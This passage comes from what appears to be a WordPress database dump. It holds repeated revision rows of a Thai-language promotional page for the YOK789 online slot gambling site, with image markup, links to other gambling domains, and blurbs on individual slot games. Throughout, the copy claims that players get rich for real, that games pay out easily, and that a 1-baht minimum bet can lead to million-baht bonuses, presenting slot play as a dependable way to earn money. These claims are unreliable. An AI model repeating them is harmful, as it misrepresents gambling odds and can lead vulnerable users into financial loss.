เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:44:28','2026-02-24 07:44:28','',44,'https://yok789ss.com/?p=329',0,'revision','',0),(330,3,'2026-02-24 07:46:19','2026-02-24 07:46:19','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว ความดีคือแม้ตั้งเบทต่ำก็ยังมีโอกาสเข้าโหมดพิเศษและฟรีสปินเหมือนเบทสูง ทุกการหมุนจึงไม่เสียเปล่า อยู่ที่การบริหารทุนและเลือกเกมให้ตรงสไตล์ ใครชอบลุ้นรัวหรือชอบค่อย ๆ ไต่ยอดก็เลือกได้ตามจังหวะตัวเอง เปิดประสบการณ์ปั่นแบบเบทเบาแต่ลุ้นหนักได้ครบในที่เดียว</p><h3><b>เกมสล็อต Mahjong Ways</b></h3><p>Mahjong Ways คือสล็อตธีมไพ่นกกระจอกที่มาแรงแบบไม่มีตกกระแส จุดเด่นอยู่ที่ระบบชนะต่อเนื่องที่ทำให้ทุกการเรียงสัญลักษณ์มีสิทธิ์ไหลยาวแบบคอมโบ ภาพกราฟิกสไตล์จีนโบราณดูแพงแต่เล่นง่าย จังหวะเกมไม่เร็วเกินไปจึงเหมาะกับสายวางแผนที่ชอบดูทรงก่อนเร่งรอบ ความเฟี้ยวของเกมนี้คือฟีเจอร์ตัวคูณที่เพิ่มขึ้นเรื่อย ๆ เมื่อชนะติดกัน ทำให้กำไรพุ่งแบบไม่ทันตั้งตัว ใครชอบฟีลค่อย ๆ สะสมความได้เปรียบแล้วปิดจบด้วยรอบโบนัสหนัก ๆ จะอินกับเกมนี้สุดทาง เล่นเพลินแต่มีชั้นเชิง ทำให้ทุกการหมุนไม่ใช่แค่ลุ้นโชคแต่คือการอ่านจังหวะและเลือกสปีดให้เข้ากับสไตล์ตัวเอง</p><h3><b>เกมสล็อต Treasures of Azte</b></h3><p>Treasures of Aztec มาในธีมอารยธรรมลึกลับที่เต็มไปด้วยสีทองและพลังแห่งขุมทรัพย์ จุดขายคือรูปแบบเกมเรียบง่ายแต่ซ่อนโอกาสแตกหนักไว้ทุกตา สัญลักษณ์มูลค่าสูงมีบทบาทชัดเจน ทำให้สายลุ้นแจ็กพอตรู้สึกหัวใจเต้นแรงทุกครั้งที่วงล้อหยุด ความสนุกอยู่ที่การเข้าใจจังหวะของเกม เพราะบางรอบอาจนิ่งแต่พอเข้าโหมดโบนัสแล้วสามารถพุ่งยาวได้แบบสะใจ เหมาะกับคนที่ชอบความตื่นเต้นสไตล์รวดเร็วไม่ต้องคิดซับซ้อน ภาพสวยคมชัด เอฟเฟกต์จัดเต็ม ช่วยเพิ่มอารมณ์ร่วมทุกครั้งที่ชนะ ทำให้การปั่นแต่ละรอบมีเสน่ห์เฉพาะตัวและสร้างความรู้สึกอยากกดต่อแบบไม่ต้องฝืนใจ</p><h3><b>เกมสล็อต Dragon Hatc</b></h3><p>Dragon Hatch คือสล็อตสายแฟนตาซีที่หยิบเรื่องราวไข่มังกรมาเติมความมันแบบจัดเต็ม จุดเด่นคือระบบจ่ายรางวัลที่เปิดทางให้ลุ้นรัวในช่วงฟรีสปิน สัญลักษณ์ไข่มังกรแต่ละใบมีมูลค่าแตกต่างกัน ทำให้ทุกการหมุนเต็มไปด้วยความคาดหวัง ความเท่ของเกมนี้คือเอฟเฟกต์ไฟและเสียงคำรามที่ปลุกอารมณ์นักล่าให้ตื่นตัวตลอดเวลา ใครชอบเกมที่มีจังหวะพีคชัดเจนและมีโอกาสพลิกเกมในรอบเดียวจะถูกใจแน่นอน เล่นง่ายไม่ซับซ้อนแต่ให้ฟีลเหมือนกำลังผจญภัยในดินแดนมังกร ทุกครั้งที่เข้าสู่โหมดพิเศษคือช่วงเวลาที่ลุ้นหนักและมีสิทธิ์เห็นยอดพุ่งแบบเกินคาด เป็นอีกเกมที่ตอบโจทย์สายปั่นยุคใหม่ที่อยากได้ทั้งความมันและโอกาสทำกำไรในรอบเดียว</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-2-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-2--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>ปั่น สล็อต ฟรี ทดลอง รวยได้จริง เล่นฟรี YOK789 ได้ทุกค่ายไม่จำกัด </h2> <p>สายอยากลองก่อนลุยจริงต้องถูกใจโหมด <b>ปั่น สล็อต ฟรี</b> ที่เปิดให้ทดลองเล่นได้แบบไม่จำกัดค่าย ไม่ต้องเติมก็เข้าไปสัมผัสระบบเกมได้ครบทุกฟีเจอร์ จะลองจับจังหวะแตก ดูรอบโบนัสหรือเทสสไตล์เกมไหนเหมาะกับตัวเองก็ทำได้เต็มที่ ความดีงามคือให้ประสบการณ์เหมือนเล่นเงินจริง ภาพลื่น เอฟเฟกต์ครบ ทำให้วางแผนก่อนลงสนามจริงได้แบบมือโปร ใครอยากฝึกอ่านเกมหรือหาสูตรปั่นที่เข้ามือสามารถใช้โหมดนี้ปั้นความมั่นใจได้สบาย เมื่อพร้อมค่อยสลับมาเล่นจริงก็เดินเกมได้เฉียบกว่าเดิม เป็นพื้นที่ให้ทั้งมือใหม่และสายเก๋าได้พัฒนาจังหวะตัวเองโดยไม่ต้องเสี่ยงทุนตั้งแต่รอบแรก เปิดทางสู่โอกาสรวยด้วยการเริ่มจากศูนย์แบบมีชั้นเชิง</p>','HOME','','inherit','closed','closed','','44-revision-v1','','','2026-02-24 07:46:19','2026-02-24 07:46:19','',44,'https://yok789ss.com/?p=330',0,'revision','',0),(331,3,'2026-02-24 07:46:19','2026-02-24 07:46:19','<img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp\" alt=\"YOK789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/True-wallet-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <img width=\"800\" height=\"800\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp\" alt=\"Yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp 800w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-150x150.webp 150w, https://amb18b.com/wp-content/uploads/2026/02/Slot-NO1-Yok789-768x768.webp 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" /> <h1>YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง</h1> <p><a href=\"https://amb18b.com/\"><b>YOK789</b></a> คือจังหวะใหม่ของสายปั่นที่อยากเปลี่ยนเวลาว่างให้กลายเป็นเงินแบบไม่ต้องคิดเยอะ เว็บสล็อตมาแรงที่กระแสกำลังพุ่งแบบหยุดไม่อยู่ จุดเด่นอยู่ที่เบทขั้นต่ำ 1 บาท เปิดทางให้มือใหม่ลองของได้สบาย ส่วนสายโปรก็ไล่ล่ากำไรได้เต็มสปีด เกมแตกง่ายภาพสวยลื่นไหลระบบเสถียรไม่สะดุด เติมถอนเร็วทันใจทำให้ทุกวินาทีมีค่า บรรยากาศในเว็บคือความคึกคักผสมความมั่นใจว่าเล่นแล้วมีลุ้นจริง ไม่ต้องทุนหนาก็มีสิทธิ์ปั้นยอดให้โตได้ทุกวัน ใครกำลังมองหาพื้นที่ทำเงินแบบสนุกและท้าทาย ที่นี่คือสนามที่ตอบโจทย์ทั้งความมันและโอกาสรวยในที่เดียว</p> <h2>ความน่าสนใจของการสมัคร YOK789 เว็บสล็อต เล่นแตกง่าย </h2> <p>ความปังของที่นี่ไม่ได้มีแค่เกมแตกง่ายแต่เริ่มตั้งแต่ขั้นตอนสมัครที่โคตรไว กรอกข้อมูลไม่กี่ขั้นก็พร้อมลุย ไม่มีความยุ่งยากให้เสียอารมณ์ รองรับทั้งมือถือและคอม เล่นได้ทุกที่ทุกเวลา ระบบความปลอดภัยแน่นหนา ทำให้มั่นใจได้ว่าข้อมูลและธุรกรรมถูกดูแลอย่างดี ที่สำคัญคือมีทีมดูแลตลอดเวลา คอยซัพพอร์ตเมื่อมีคำถามหรือปัญหาเกิดขึ้น <a href=\"https://luca333auto.com/\"><b>เข้าสู่ระบบ</b></a> ที่นี่จุดแข็งอีกอย่างคือการอัปเดตเกมใหม่สม่ำเสมอ ทำให้ไม่รู้สึกจำเจ เล่นเมื่อไรก็มีอะไรสดใหม่ให้ลอง ใครอยากเปิดประสบการณ์สล็อตแบบมันจัดเต็มและมีโอกาสทำกำไรจริง การสมัครที่นี่คือก้าวแรกสู่เส้นทางสายปั่นที่ไม่ธรรมดา</p><ul><li><b>YOK789 </b><b>แจกโปรโมชันจัดเต็ม </b></li></ul><p><b>ถ้าพูดถึงความคุ้มที่จับต้องได้ เว็บเราคือสายเปย์ตัวจริง โปรโมชันมาแบบจัดหนักจัดเต็มไม่มีกั๊ก ทั้งโบนัสสมาชิกใหม่ โปรฝากรายวัน และกิจกรรมลุ้นรางวัลที่สลับหมุนเวียนให้ร่วมสนุกตลอด ทำให้ทุกการเติมเงินมีพลังมากกว่าปกติ ความพีคอยู่ที่เงื่อนไขเข้าใจง่าย ไม่ซับซ้อน รับสิทธิ์ไวไม่ต้องรอนาน แค่กดรับก็พร้อมลุยต่อได้ทันที บรรยากาศในเว็บเลยเต็มไปด้วยความตื่นเต้นเหมือนมีบูสต์เพิ่มทุกครั้งที่หมุน เกมสล็อตแต่ละรอบมีความหวังมากขึ้นเพราะมีโปรช่วยดัน ใครชอบฟีลเล่นแล้วได้กำไรเพิ่มแบบเนียน ๆ ที่นี่ตอบโจทย์แบบสุดทาง ทำให้การปั่นทุกครั้งไม่ใช่แค่สนุกแต่ยังรู้สึกว่าคุ้มค่าแบบเห็นชัดทุกยอด</b></p><ul><li><b>ใช้ทุนน้อยก็เล่นได้ </b></li></ul><p><b>สายงบน้อยไม่ต้องถอยเปิดโหมดให้เริ่มต้นง่ายด้วยเบทสบายกระเป๋า แค่มีทุนหลักสิบก็เข้ามาสัมผัสความมันได้ทันที ไม่ต้องรอเงินก้อนใหญ่ก็มีสิทธิ์ลุ้นรางวัล ระบบเกมถูกออกแบบให้มือใหม่จับทางได้ไว เล่นเพลินไม่กดดัน ทำให้การบริหารทุนเป็นเรื่องง่าย ใครอยากค่อย ๆ ปั้นกำไรแบบไม่เสี่ยงหนักก็วางแผนได้ตามสไตล์ ความเฟี้ยวคือแม้ใช้ทุนไม่มากก็ยังได้ฟีลเดียวกับสายทุนสูง ทุกการหมุนมีโอกาสแตกจริงแบบไม่แบ่งชนชั้น เป็นพื้นที่ที่ให้ทุกคนเริ่มต้นได้เท่ากัน แล้วค่อยต่อยอดกำไรให้โตขึ้นตามจังหวะของตัวเอง</b></p><ul><li><b>เกมหลากหลาย ค่ายดังครบ </b></li></ul><p>ความสนุกของเว็บคือการรวมเกมหลากหลายแนวไว้ในที่เดียว ทั้งสล็อตธีมแฟนตาซี ผจญภัย วัฒนธรรม และสไตล์คลาสสิกให้เลือกปั่นไม่ซ้ำอารมณ์ ค่ายเกมชั้นนำถูกคัดมาแบบเน้นคุณภาพ ภาพกราฟิกคมชัด เอฟเฟกต์จัดเต็ม เล่นแล้วลื่นไหลไม่มีสะดุด ทำให้ทุกครั้งที่เข้าเว็บเหมือนได้เปิดโลกใหม่ของความบันเทิง จะสายชอบโบนัสกระจายหรือสายลุ้นแจ็กพอตก็มีตัวเลือกตอบโจทย์ครบ ความดีงามคือมีการอัปเดตเกมใหม่เข้ามาเรื่อย ๆ ไม่ปล่อยให้ความสนุกดรอป ใครเบื่ออะไรเดิม ๆ ก็สลับแนวได้ทันที เป็นคลังเกมที่ทำให้การปั่นแต่ละวันไม่น่าเบื่อและเต็มไปด้วยสีสันตลอดเวลา</p> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp\" alt=\"yok789\" srcset=\"https://amb18b.com/wp-content/uploads/2026/02/Character-1-.webp 1200w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--300x125.webp 300w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2026/02/Character-1--768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>บอกต่อทางเข้าการทำเงิน ทางเข้า YOK เว็บแจกโบนัส ปัน โปร สล็อต</h2> <p>ใครกำลังส่องช่องทางทำเงินแบบไม่ต้องรอจังหวะชีวิต ต้องลองเข้ามาเช็กอินกับเรา เพราะที่นี่ขึ้นชื่อเรื่องแจกโบนัสแบบจัดเต็ม โปรสล็อตมาแบบไม่กั๊ก ทั้งโบนัสต้อนรับ โปรฝากคุ้ม และกิจกรรมลุ้นรางวัลที่อัปเดตตลอด ทำให้ทุกการฝากมีมูลค่าเพิ่มมากกว่าที่คิด ความเฟี้ยวอยู่ตรงที่ระบบคำนวณอัตโนมัติ รับโปรง่ายไม่ต้องทักแชตให้เสียเวลา แค่เข้าเล่นก็มีสิทธิ์รับสิทธิพิเศษแบบต่อเนื่อง บอกเลยว่าสายล่ากำไรจะรู้สึกเหมือนได้ตัวช่วยเพิ่มพลังทุกครั้งที่หมุน เกมสล็อตหลากหลายค่ายดังรวมไว้ครบ จัดเต็มทั้งความสนุกและโอกาสทำยอดให้พุ่งแบบไม่ต้องลุ้นเหนื่อย</p> <h2>เว็บสล็อตมาแรง YOK789 เบทขั้นต่ำ 1 บาท แจกโบนัสหลักล้าน</h2> <p>กระแสความแรงของเว็บไม่ได้มาเล่น ๆ เพราะนี่คือเว็บสล็อตที่เปิดประตูให้ทุกคนเริ่มต้นด้วยเบทขั้นต่ำ 1 บาท แต่ศักยภาพการทำกำไรพุ่งได้ไกลระดับโบนัสหลักล้าน ความต่างอยู่ที่ระบบเกมคัดมาเน้นจังหวะแตกกำลังดี ทำให้สายทุนน้อยก็มีลุ้น ส่วนสายจริงจังก็เร่งรอบไล่ยอดได้เต็มที่ โปรโมชันถูกปล่อยออกมาแบบต่อเนื่อง เพิ่มแรงส่งให้ทุกยอดเดิมพันมีมูลค่ามากขึ้น บรรยากาศการเล่นเลยเต็มไปด้วยพลังและความหวัง ทุกครั้งที่หมุนเหมือนมีโอกาสเปิดทางสู่เงินก้อนใหญ่ ไม่ต้องรอจังหวะฟลุกอย่างเดียวแต่ใช้การวางแผนควบคู่ไปด้วย ใครกำลังมองหาเว็บที่เริ่มเล็กแต่โตได้จริง ที่นี่คือคำตอบที่ชัดเจนในโลกสายปั่นยุคใหม่</p> <h2>เว็บตรง YOK ยกตัวอย่างสล็อตน่าเล่นเริ่มต้นด้วยเงินทุน ปั่น สล็อต 1 บาท</h2> <p>ถ้าอยากเริ่ม <b>ปั่น สล็อต 1 บาท</b> แล้วได้ฟีลคุ้มค่า มีสล็อตหลายแนวที่ออกแบบมาให้เล่นง่ายและลุ้นสนุก เกมธีมสมบัติหรือแนวผจญภัยมักมีรอบโบนัสสุ่มแตกไว เหมาะกับสายค่อย ๆ เก็บกำไร ส่วนแนวผลไม้คลาสสิกให้จังหวะเข้าใจง่าย หมุนเพลินไม่ซับซ้อน ทำให้มือใหม่จับทางได้เร็ว 